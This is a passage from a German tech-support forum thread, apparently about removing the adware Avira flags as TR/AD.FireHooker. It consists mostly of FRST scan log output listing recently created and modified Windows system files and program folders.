2020-09-15 17:42 - 2020-09-15 17:42 - 000186472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000183112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msgpioclx.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000180040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000180024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAuto.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000169456 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000167880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidpolicyconverter.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000147256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000143104 _____ (Microsoft Corporation) C:\WINDOWS\system32\profapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000142336 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\CustomInstallExec.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000136704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredDialogBroker.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GraphicsCapture.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000132928 _____ (Microsoft Corporation) C:\WINDOWS\system32\oemlicense.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000132728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptcatsvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssitlb.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000126976 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Utilman.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000118072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthProxyStub.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000117048 _____ (Microsoft Corporation) C:\WINDOWS\system32\icfupgd.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000116024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsiCx.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\dab.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcsvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwm.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditBufferTestHook.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\UsoClient.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidsvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntlanman.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcsvc6.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000069752 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidapi.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000068928 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\msscntrs.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000064824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthHost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000064008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmRes.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.SystemId.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000059448 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryCore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagnosticdataquery.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCShellCommonProxyStub.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmprovhost.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\WordBreakers.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAgent.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidtel.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\applockerfltr.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 000017216 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmplpxy.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 006193664 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 005776544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 004592136 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 003847680 _____ (Microsoft Corporation) C:\WINDOWS\system32\tellib.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 003436544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 002647040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 002103704 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 002102784 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowsudk.shellcommon.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001924608 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001905664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001766912 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdprt.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001548288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\system32\TaskFlowDataEngine.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001514496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001277440 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001257984 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001140928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001114112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001030656 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 001021952 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000992768 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000951808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000939448 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000934912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Service.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000929792 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000914216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000844448 _____ (Microsoft Corporation) C:\WINDOWS\system32\pkeyhelper.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000822784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\PEAuth.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000809280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000803328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000777728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShellCommonCommonProxyStub.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000752640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000733696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000702776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000657920 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000637440 _____ (Microsoft Corporation) C:\WINDOWS\system32\UiaManager.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000609792 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000602440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2020-09-15 17:41 - 2020-09-15 17:41 - 000585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000552960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftAccountWAMExtension.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000527880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000481792 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000475136 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000472376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000437760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftAccountExtension.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000430592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000429880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volsnap.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000428672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000421888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanui.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000420456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000418800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000393728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlangpui.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000361472 _____ C:\WINDOWS\system32\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_InputPersonalization.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000305472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000289280 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3svc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000259584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winnat.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000255296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000239432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxApplicabilityEngine.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringservice.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000223040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ataport.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000195896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000185672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000185664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbccgp.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000160064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbus.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000159048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000155952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000152376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadWamExtension.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatialAudioLicenseSrv.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcDecoderHost.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlgpclnt.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2020-09-15 17:41 - 2020-09-15 17:41 - 000107008 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3msm.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3api.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\monitor.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\autopilot.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000078528 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsManagementServiceWinRt.ProxyStub.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringclient.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000070976 _____ (Microsoft Corporation) C:\WINDOWS\system32\GameInput.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.PlatformExtension.DevicePickerExperience.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000060744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storufs.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AssignedAccessRuntime.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000056648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pciidex.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\audioresourceregistrar.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringconfigsp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiredNetworkCSP.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthMini.SYS
2020-09-15 17:41 - 2020-09-15 17:41 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\IcsEntitlementHost.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\KNetPwrDepBroker.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.drv
2020-09-15 17:41 - 2020-09-15 17:41 - 000030024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\atapi.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000029456 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmbuspipe.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\midimap.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdiagnostics.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000019776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelide.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000016704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pciide.sys
2020-09-15 17:07 - 2020-08-25 05:42 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-09-15 17:07 - 2020-08-25 05:36 - 000495616 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
         

Alt 04.10.2020, 15:54   #9
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Und FRST Teil 2:
Code:
ATTFilter
==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-10-04 15:31 - 2018-10-06 14:20 - 000000000 ____D C:\Program Files (x86)\Steam
2020-10-04 15:31 - 2018-10-06 14:15 - 000000000 ____D C:\Users\Tamy\AppData\LocalLow\Mozilla
2020-10-04 15:30 - 2020-08-18 08:57 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-10-04 15:30 - 2020-08-18 08:31 - 000008192 ___SH C:\DumpStack.log.tmp
2020-10-04 15:30 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-10-04 15:30 - 2019-01-03 10:16 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-10-04 15:30 - 2018-10-06 14:51 - 000000000 ____D C:\ProgramData\NVIDIA
2020-10-04 15:29 - 2019-12-07 11:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-10-04 12:47 - 2020-08-18 08:31 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-10-04 11:43 - 2019-12-07 11:14 - 000000000 ____D C:\Program Files\Windows Defender
2020-10-04 11:43 - 2018-06-08 10:14 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-10-04 11:38 - 2018-10-06 14:21 - 000000000 ____D C:\ProgramData\Avira
2020-10-04 11:36 - 2020-08-18 08:57 - 000003688 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-10-04 11:36 - 2020-08-18 08:57 - 000003464 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-10-04 11:36 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2020-10-04 11:36 - 2018-04-12 01:38 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2020-10-04 11:33 - 2020-08-18 08:31 - 000437416 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-10-04 11:32 - 2018-10-06 14:15 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-10-04 11:30 - 2019-12-07 11:13 - 000000000 ____D C:\WINDOWS\INF
